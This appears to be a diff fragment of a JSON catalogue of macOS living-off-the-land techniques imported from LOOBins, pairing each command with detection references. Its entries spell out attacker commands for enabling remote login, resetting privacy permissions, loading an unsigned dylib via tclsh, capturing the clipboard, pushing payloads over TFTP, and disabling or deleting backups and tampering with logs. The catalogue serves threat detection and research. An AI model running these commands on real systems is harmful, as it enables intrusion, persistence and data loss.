"availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect activity related to sysctl in an interactive shell", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/sysctl_activity" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysctl.yml", + "https://evasions.checkpoint.com/src/MacOS/macos.html" + ] + }, + { + "id": "loobins:system_profiler:94bcdf5d6eceb23d", + "toolId": "loobins:system_profiler", + "toolName": "system_profiler", + "name": "Listing the available datatypes", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "system_profiler -listDataTypes", + "description": "List all available sub-systems to get information from.", + "mitre": [], + "fullPath": [ + "/usr/sbin/system_profiler" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "System Information Discovery Using System_Profiler", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml" + }, + { + "type": "Jamf Protect: Detect system_profiler activity that gathers system information", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/system_profiler_activity" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/system_profiler.yml", + "https://macosbin.com/bin/system_profiler", + "https://ss64.com/osx/system_profiler.html" + ] + }, + { + "id": "loobins:system_profiler:280ec67aa6e4fde6", + "toolId": "loobins:system_profiler", + "toolName": "system_profiler", + "name": "Print hardware information", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "system_profiler SPHardwareDataType", + "description": "Prints an overview of the hardware of the current machine, including its model name and serial number.", + "mitre": [], + "fullPath": [ + "/usr/sbin/system_profiler" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "System Information Discovery Using System_Profiler", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml" + }, + { + "type": "Jamf Protect: Detect system_profiler activity that gathers system information", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/system_profiler_activity" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/system_profiler.yml", + "https://macosbin.com/bin/system_profiler", + "https://ss64.com/osx/system_profiler.html" + ] + }, + { + "id": "loobins:system_profiler:04c45f4b68269440", + "toolId": "loobins:system_profiler", + "toolName": "system_profiler", + "name": "Print software information", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "system_profiler SPSoftwareDataType", + "description": "Prints an overview of the software of the current machine, including the exact macOS version number.", + "mitre": [], + "fullPath": [ + "/usr/sbin/system_profiler" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "System Information Discovery Using System_Profiler", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml" + }, + { + "type": "Jamf Protect: Detect system_profiler activity that gathers system information", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/system_profiler_activity" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/system_profiler.yml", + "https://macosbin.com/bin/system_profiler", + "https://ss64.com/osx/system_profiler.html" + ] + }, + { + "id": "loobins:system_profiler:5501ae493999a365", + "toolId": "loobins:system_profiler", + "toolName": "system_profiler", + "name": "Print the information of developer tools", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "system_profiler SPDeveloperToolsDataType", + "description": "Prints the currently active version of the Xcode developer tools and SDK.", + "mitre": [], + "fullPath": [ + "/usr/sbin/system_profiler" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "System Information Discovery Using System_Profiler", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml" + }, + { + "type": "Jamf Protect: Detect system_profiler activity that gathers system information", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/system_profiler_activity" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/system_profiler.yml", + "https://macosbin.com/bin/system_profiler", + "https://ss64.com/osx/system_profiler.html" + ] + }, + { + "id": "loobins:system_profiler:ae2eb524d89a31c7", + "toolId": "loobins:system_profiler", + "toolName": "system_profiler", + "name": "Print power and battery information", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "system_profiler SPPowerDataType", + "description": "Prints power and battery information, including the current AC wattage and battery cycle count.", + "mitre": [], + "fullPath": [ + "/usr/sbin/system_profiler" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "System Information Discovery Using System_Profiler", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml" + }, + { + "type": "Jamf Protect: Detect system_profiler activity that gathers system information", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/system_profiler_activity" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/system_profiler.yml", + "https://macosbin.com/bin/system_profiler", + "https://ss64.com/osx/system_profiler.html" + ] + }, + { + "id": "loobins:systemsetup:92b5002344055d13", + "toolId": "loobins:systemsetup", + "toolName": "systemsetup", + "name": "Enable Remote Login", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Lateral Movement" + ], + "nativeCategory": [ + "Lateral Movement" + ], + "command": "sudo systemsetup -setremotelogin on", + "description": "systemsetup can be used to enable SSH for remote login", + "mitre": [], + "fullPath": [ + "/usr/sbin/systemsetup" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Command line argument detection containing (args contain systemsetup AND (-setremoteappleevents OR -setremotelogin) AND on)", + "value": "https://www.elastic.co/guide/en/security/current/remote-ssh-login-enabled-via-systemsetup-command.html" + }, + { + "type": "Jamf Protect: Detect systemsetup activity that enables remotelogin or appleremoteevents", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/systemsetup_activity" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/systemsetup.yml", + "https://ss64.com/osx/systemsetup.html" + ] + }, + { + "id": "loobins:systemsetup:8cf0ab2815bd3147", + "toolId": "loobins:systemsetup", + "toolName": "systemsetup", + "name": "Enable Remote Apple Events", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Lateral Movement" + ], + "nativeCategory": [ + "Lateral Movement" + ], + "command": "sudo systemsetup -setremoteappleevents on", + "description": "systemsetup can be used to enable Remote Apple Events. \nSet whether the system responds to events sent by other computers (such as AppleScripts).\n", + "mitre": [], + "fullPath": [ + "/usr/sbin/systemsetup" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Command line argument detection containing (args contain systemsetup AND (-setremoteappleevents OR -setremotelogin) AND on)", + "value": "https://www.elastic.co/guide/en/security/current/remote-ssh-login-enabled-via-systemsetup-command.html" + }, + { + "type": "Jamf Protect: Detect systemsetup activity that enables remotelogin or appleremoteevents", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/systemsetup_activity" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/systemsetup.yml", + "https://ss64.com/osx/systemsetup.html" + ] + }, + { + "id": "loobins:tccutil:a2a8e1b9b60cb400", + "toolId": "loobins:tccutil", + "toolName": "tccutil", + "name": "Use the tccutil to reset specific permissions", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "tccutil reset AppleEvents", + "description": "Banshee Stealer resets the permissions that have already been allowed to applications on the system, which will cause the user to be prompted to give them again. This action may be intended to trick the user into unknowingly giving authorizations to the malware.", + "mitre": [], + "fullPath": [ + "/usr/bin/tccutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tccutil.yml", + "https://ss64.com/mac/tccutil.html", + "https://research.checkpoint.com/2025/banshee-macos-stealer-that-stole-code-from-macos-xprotect/" + ] + }, + { + "id": "loobins:tccutil:74f4c88c5da560ab", + "toolId": "loobins:tccutil", + "toolName": "tccutil", + "name": "Use the tccutil to reset specific permissions for an application", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "tccutil reset AppleEvents com.apple.Terminal", + "description": "Attackers use tccutil to reset permissions for services like Camera, Microphone, or AppleEvents.", + "mitre": [], + "fullPath": [ + "/usr/bin/tccutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tccutil.yml", + "https://ss64.com/mac/tccutil.html", + "https://research.checkpoint.com/2025/banshee-macos-stealer-that-stole-code-from-macos-xprotect/" + ] + }, + { + "id": "loobins:tclsh:73ff199dee11f733", + "toolId": "loobins:tclsh", + "toolName": "tclsh", + "name": "Execute malicious dynamic library (.dylib) from standard input", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Execution" + ], + "nativeCategory": [ + "Execution" + ], + "command": "echo \"load bad.dylib\" | tclsh", + "description": "An attacker can execute a malicious .dylib from stdin by echoing a load command and piping to tclsh. This will bypass code signing requirements.", + "mitre": [], + "fullPath": [ + "/usr/bin/tclsh" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Recommendations included in resource below. No formal detection content at this time.", + "value": "https://medium.com/specter-ops-posts/dylib-loads-that-tickle-your-fancy-d25196addd8c" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tclsh.yml", + "https://medium.com/specter-ops-posts/dylib-loads-that-tickle-your-fancy-d25196addd8c" + ] + }, + { + "id": "loobins:textutil:51b3787cb7533e11", + "toolId": "loobins:textutil", + "toolName": "textutil", + "name": "Use the textutil to read several files and build a new file", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion", + "Collection" + ], + "nativeCategory": [ + "Defense Evasion", + "Collection" + ], + "command": "textutil -convert html Quote.doc secondQuote.doc", + "description": "A one-liner can load the content of multiple RTF files in a directory, concatenate their contents, and write the results out as a new file. This provides two sub-use-cases; one is building a malicious file from a collection of smaller files which could evade both network and host-based security controls as the traditional means of signature-based detection would be redundant; two is concatenating the content of several, potentially sensitive files before exfiltration. This command can also be looped to iterate a directory of files.", + "mitre": [], + "fullPath": [ + "/usr/bin/textutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Command Line Argument Detection (args contain textutil AND (-convert OR -stdin OR pbpaste))", + "value": "Command Line Argument Detection (args contain textutil AND (-convert OR -stdin OR pbpaste))" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/textutil.yml", + "https://osxdaily.com/tag/textutil/" + ] + }, + { + "id": "loobins:textutil:4dc3a5da2507547e", + "toolId": "loobins:textutil", + "toolName": "textutil", + "name": "Capture clipboard content", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Credential Access", + "Collection" + ], + "nativeCategory": [ + "Credential Access", + "Collection" + ], + "command": "pbpaste | textutil -stdin -info > Clipboard.txt", + "description": "By leveraging another command line tool, pbpaste, it is possible to write a one-liner which captures the content of the clipboard. If an attacker already has access to the system, the attacker could run this command to obtain sensitive information such as a password and then elevate their privileges or exfiltrate the information.", + "mitre": [], + "fullPath": [ + "/usr/bin/textutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Command Line Argument Detection (args contain textutil AND (-convert OR -stdin OR pbpaste))", + "value": "Command Line Argument Detection (args contain textutil AND (-convert OR -stdin OR pbpaste))" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/textutil.yml", + "https://osxdaily.com/tag/textutil/" + ] + }, + { + "id": "loobins:tftp:7e0e23e01b3fdd09", + "toolId": "loobins:tftp", + "toolName": "tftp", + "name": "Activate the built-in TFTP server via launchctl", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Lateral Movement", + "Persistence" + ], + "nativeCategory": [ + "Lateral Movement", + "Persistence" + ], + "command": "sudo launchctl load -w /System/Library/LaunchDaemons/tftp.plist\n\n# Create placeholder for each file to be received\nsudo touch /private/tftpboot/payload.sh && sudo chmod 666 /private/tftpboot/payload.sh", + "description": "macOS ships with a launchd plist for tftpd at /System/Library/LaunchDaemons/tftp.plist. Loading it with launchctl starts the TFTP server on UDP port 69, serving /private/tftpboot. Requires root. A placeholder file must be created for each file to be transferred, as the default configuration does not allow tftpd to create new files.", + "mitre": [], + "fullPath": [ + "/usr/bin/tftp", + "/usr/libexec/tftpd" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tftp.yml", + "https://ss64.com/mac/tftp.html", + "https://en.wikipedia.org/https://hackviser.com/tactics/pentesting/services/tftp", + "https://www.stamus-networks.com/blog/uncovered-uncovering-risk-exposure-from-publicly-accessible-unauthenticated-tftp", + "https://attack.mitre.org/techniques/T1105/", + "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" + ] + }, + { + "id": "loobins:tftp:9714c3c02da83a7b", + "toolId": "loobins:tftp", + "toolName": "tftp", + "name": "Transfer a file to a target using the tftp client", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Lateral Movement" + ], + "nativeCategory": [ + "Lateral Movement" + ], + "command": "tftp <TARGET_IP> << EOF\nbinary\nput /tmp/payload.sh payload.sh\nquit\nEOF", + "description": "The built-in tftp client can push files to a remote TFTP server. The binary mode flag ensures files are not corrupted during transfer.", + "mitre": [], + "fullPath": [ + "/usr/bin/tftp", + "/usr/libexec/tftpd" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tftp.yml", + "https://ss64.com/mac/tftp.html", + "https://en.wikipedia.org/https://hackviser.com/tactics/pentesting/services/tftp", + "https://www.stamus-networks.com/blog/uncovered-uncovering-risk-exposure-from-publicly-accessible-unauthenticated-tftp", + "https://attack.mitre.org/techniques/T1105/", + "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" + ] + }, + { + "id": "loobins:tftp:bc764b7dca517eae", + "toolId": "loobins:tftp", + "toolName": "tftp", + "name": "Run unprivileged TFTP server on a non-standard port", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Lateral Movement", + "Defense Evasion", + "Persistence" + ], + "nativeCategory": [ + "Lateral Movement", + "Defense Evasion", + "Persistence" + ], + "command": "mkdir -p /tmp/tftp_server && chmod 777 /tmp/tftp_server\ntee /tmp/com.user.tftp.plist > /dev/null << 'EOF'\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n <key>Label</key>\n <string>com.user.tftp</string>\n <key>WorkingDirectory</key>\n <string>/tmp/tftp_server</string>\n <key>ProgramArguments</key>\n <array>\n <string>/usr/libexec/tftpd</string>\n <string>-w</string>\n <string>-l</string>\n <string>-u</string>\n <string>$(whoami)</string>\n </array>\n <key>inetdCompatibility</key>\n <dict>\n <key>Wait</key>\n <true/>\n </dict>\n <key>Sockets</key>\n <dict>\n <key>Listeners</key>\n <dict>\n <key>SockServiceName</key>\n <string>6969</string>\n <key>SockType</key>\n <string>dgram</string>\n <key>SockFamily</key>\n <string>IPv4</string>\n </dict>\n </dict>\n</dict>\n</plist>\nEOF\nlaunchctl load -w /tmp/com.user.tftp.plist", + "description": "Without root access, tftpd can be loaded from a user-created launchd plist stored anywhere on disk (e.g., /tmp). Passing the -w flag allows tftpd to create new files on write, removing the placeholder requirement. The server can be bound to any unprivileged port.", + "mitre": [], + "fullPath": [ + "/usr/bin/tftp", + "/usr/libexec/tftpd" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tftp.yml", + "https://ss64.com/mac/tftp.html", + "https://en.wikipedia.org/https://hackviser.com/tactics/pentesting/services/tftp", + "https://www.stamus-networks.com/blog/uncovered-uncovering-risk-exposure-from-publicly-accessible-unauthenticated-tftp", + "https://attack.mitre.org/techniques/T1105/", + "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" + ] + }, + { + "id": "loobins:tmutil:00548da211e6bb02", + "toolId": "loobins:tmutil", + "toolName": "tmutil", + "name": "Disable Time Machine", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [], + "nativeCategory": [ + "Impact" + ], + "command": "tmutil disable", + "description": "The following command disables Time Machine. An attacker can use this to prevent backups from occurring.", + "mitre": [], + "fullPath": [ + "/usr/bin/tmutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect the deletion of localsnapshots", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/tmutil_activity" + }, + { + "type": "Sigma: Time Machine Backup Deletion Attempt Via Tmutil - MacOS", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml" + }, + { + "type": "Sigma: Time Machine Backup Disabled Via Tmutil - MacOS", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml" + }, + { + "type": "Sigma: New File Exclusion Added To Time Machine Via Tmutil - MacOS", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tmutil.yml", + "https://theevilbit.github.io/posts/cve_2020_9771/", + "https://github.molgen.mpg.de/pages/bs/macOSnotes/mac/mac_files_tmutil.html", + "https://danielcortez.substack.com/p/living-off-the-land-exploring-macos-0fd" + ] + }, + { + "id": "loobins:tmutil:597a7c20b410d2a8", + "toolId": "loobins:tmutil", + "toolName": "tmutil", + "name": "Delete a backup", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [], + "nativeCategory": [ + "Impact" + ], + "command": "tmutil delete /path/to/backup", + "description": "The following command deletes the specified backup. An adversary may perform this action before launching a ransomware attack to prevent the victim from restoring their files.", + "mitre": [], + "fullPath": [ + "/usr/bin/tmutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect the deletion of localsnapshots", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/tmutil_activity" + }, + { + "type": "Sigma: Time Machine Backup Deletion Attempt Via Tmutil - MacOS", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml" + }, + { + "type": "Sigma: Time Machine Backup Disabled Via Tmutil - MacOS", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml" + }, + { + "type": "Sigma: New File Exclusion Added To Time Machine Via Tmutil - MacOS", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tmutil.yml", + "https://theevilbit.github.io/posts/cve_2020_9771/", + "https://github.molgen.mpg.de/pages/bs/macOSnotes/mac/mac_files_tmutil.html", + "https://danielcortez.substack.com/p/living-off-the-land-exploring-macos-0fd" + ] + }, + { + "id": "loobins:tmutil:8e499d87e4d49768", + "toolId": "loobins:tmutil", + "toolName": "tmutil", + "name": "Restore a backup", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Collection" + ], + "nativeCategory": [ + "Collection" + ], + "command": "tmutil restore /path/to/backup", + "description": "The following command restore the specified backup. An attacker can use this to restore a backup of a sensitive file that was deleted.", + "mitre": [], + "fullPath": [ + "/usr/bin/tmutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect the deletion of localsnapshots", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/tmutil_activity" + }, + { + "type": "Sigma: Time Machine Backup Deletion Attempt Via Tmutil - MacOS", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml" + }, + { + "type": "Sigma: Time Machine Backup Disabled Via Tmutil - MacOS", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml" + }, + { + "type": "Sigma: New File Exclusion Added To Time Machine Via Tmutil - MacOS", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tmutil.yml", + "https://theevilbit.github.io/posts/cve_2020_9771/", + "https://github.molgen.mpg.de/pages/bs/macOSnotes/mac/mac_files_tmutil.html", + "https://danielcortez.substack.com/p/living-off-the-land-exploring-macos-0fd" + ] + }, + { + "id": "loobins:tmutil:13d81191962d0f5c", + "toolId": "loobins:tmutil", + "toolName": "tmutil", + "name": "Tamper with system logs", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Privilege Escalation" + ], + "nativeCategory": [ + "Privilege Escalation" + ], + "command": "mkdir /tmp/snapshot\ntmutil localsnapshot\ntmutil listlocalsnapshots /\nmount_apfs -o noowners -s com.apple.TimeMachine.2023-05-01-090000.local /System/Volumes/Data /tmp/snapshot\nopen /tmp/snapshot\nsudo vim /var/log/system.log\ntmutil restore com.apple.TimeMachine.2023-05-01-090000.local", + "description": "An adversary can use the snapshot and restore commands together to tamper with system logs. This is fixed in macOS 10.15.4+.", + "mitre": [], + "fullPath": [ + "/usr/bin/tmutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect the deletion of localsnapshots", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/tmutil_activity" + }, + { + "type": "Sigma: Time Machine Backup Deletion Attempt Via Tmutil - MacOS", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml" + }, + { + "type": "Sigma: Time Machine Backup Disabled Via Tmutil - MacOS", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml" + }, + { + "type": "Sigma: New File Exclusion Added To Time Machine Via Tmutil - MacOS", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tmutil.yml", + "https://theevilbit.github.io/posts/cve_2020_9771/", + "https://github.molgen.mpg.de/pages/bs/macOSnotes/mac/mac_files_tmutil.html", + "https://danielcortez.substack.com/p/living-off-the-land-exploring-macos-0fd" + ] + }, + { + "id": "loobins:tmutil:934af9b671652c59", + "toolId": "loobins:tmutil", + "toolName": "tmutil", + "name": "Exclude path from backup", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "tmutil addexclusion /path/to/exclude", + "description": "An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.", + "mitre": [], + "fullPath": [ + "/usr/bin/tmutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect the deletion of localsnapshots", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/tmutil_activity" + }, + { + "type": "Sigma: Time Machine Backup Deletion Attempt Via Tmutil - MacOS", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml" + }, + { + "type": "Sigma: Time Machine Backup Disabled Via Tmutil - MacOS", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml" + }, + { + "type": "Sigma: New File Exclusion Added To Time Machine Via Tmutil - MacOS", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tmutil.yml", + "https://theevilbit.github.io/posts/cve_2020_9771/", + "https://github.molgen.mpg.de/pages/bs/macOSnotes/mac/mac_files_tmutil.html", + "https://danielcortez.substack.com/p/living-off-the-land-exploring-macos-0fd" + ] + }, + { + "id": "loobins:xattr:94a0b1454bdcb216", + "toolId": "loobins:xattr", + "toolName": 